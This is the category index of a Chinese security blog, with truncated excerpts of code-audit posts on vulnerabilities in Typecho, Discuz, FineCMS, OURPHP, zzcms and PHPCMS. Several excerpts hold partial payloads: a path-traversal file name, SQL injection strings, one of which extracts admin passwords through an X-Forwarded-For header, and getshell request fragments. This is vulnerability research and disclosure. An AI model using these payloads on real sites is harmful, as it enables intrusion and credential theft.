分类 代码审计 下的文章:

Typecho install.php 反序列化导致任意代码执行
发表于: | 分类: 代码审计 | 评论:8 | 阅读: 6066
0x00 前言 听说了这个洞,吓得赶紧去看了一下自己的博客,发现自己当初安装完就把这个文件和install目录删了,看来当初自己安全意识还是可以滴 233 0x01 Payload GET /typecho/install.php?finish=1 HTTP/1....

阅读全文>>

Discuz X2.5-3.4任意文件删除
发表于: | 分类: 代码审计 | 评论:0 | 阅读: 2627
0x00 漏洞利用 注册账号,登陆后访问: home.php?mod=spacecp 修改真实姓名: ../../../robots.txt 查看源代码,找到formhash的value值: 构造表单: <form action="http:/...

阅读全文>>

Python实现对比cms版本更新内容
发表于: | 分类: Python,代码审计 | 评论:3 | 阅读: 7528
对比两个cms版本代码差异,快速定位漏洞。 使用方法 python diff.py dir1 dir2 [1|0]是否显示更新内容 #!/usr/bin/env python #coding=utf-8 import sys import os import...

阅读全文>>

FineCMS V5.0.10 任意文件上传&&任意代码执行&&任意SQL语句执行
发表于: | 分类: 代码审计 | 评论:4 | 阅读: 3868
0x1 Payload 0x11 任意文件上传 注册个用户,修改头像,选择一张图片马: 抓包,修改post中tx参数中的jpg为php: getshell: 目录中的1位用户id,稍微爆破一下即可。 (PS:可以在cookie中可以看到uid) 0x12 任...

阅读全文>>

OURPHP V1.7.3(20170615) 前台SQL注入
发表于: | 分类: 代码审计 | 评论:0 | 阅读: 1371
Payload 自古审计先上payload: 用户登录: 用户名:)union selselectect 1,user(),3,4,5-- p0' 密码随便填 登录后: 官网demo: 代码分析 问题出在过滤函数: ourphp/function/ourp...

阅读全文>>

zzcms_V8.1-170511 X-Forwarded-For二次注入
发表于: | 分类: 代码审计 | 评论:2 | 阅读: 1223
0x01 POC 注册一个用户,访问/user/adv.php,添加X-Forwarded-For为ip',qq=(select concat(admin,0x7c,pass) from zzcms_admin),email='p0@p0sec.net 用户中心...

阅读全文>>

PHPCMS_V9.6.0 前台GETSHELL
发表于: | 分类: 代码审计 | 评论:0 | 阅读: 2072
0x00 POC url: /index.php?m=member&c=index&a=register&siteid=1 post数据:siteid=1&modelid=11&username=abcd&pa...

阅读全文>>

phpcms远程任意代码执行
发表于: | 分类: 代码审计 | 评论:0 | 阅读: 1295
0x00 前言 存在漏洞版本:<=20150305 系统要求:PHP5.2,站长开启了一项投票 利用需要使用到mysql和php的2个小特性 mysql在存储数据的时候会根据当前数据库的字符集来校验数据,发现非法数据时会抛弃其后续数据,比如:Insert i...

阅读全文>>